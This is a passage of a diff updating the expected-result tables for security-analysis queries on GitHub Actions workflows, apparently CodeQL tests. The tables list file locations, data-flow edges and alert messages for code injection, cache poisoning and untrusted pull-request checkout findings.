steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d919880e7264..35887c3b3707 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index d434bd63c518..6a91d49c0ca0 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,12 +1,122 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | +edges +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +#select +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 92d5a0b5ce18..29b311435dd5 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,8 +1,265 @@ -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +edges +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | +| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | +| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| 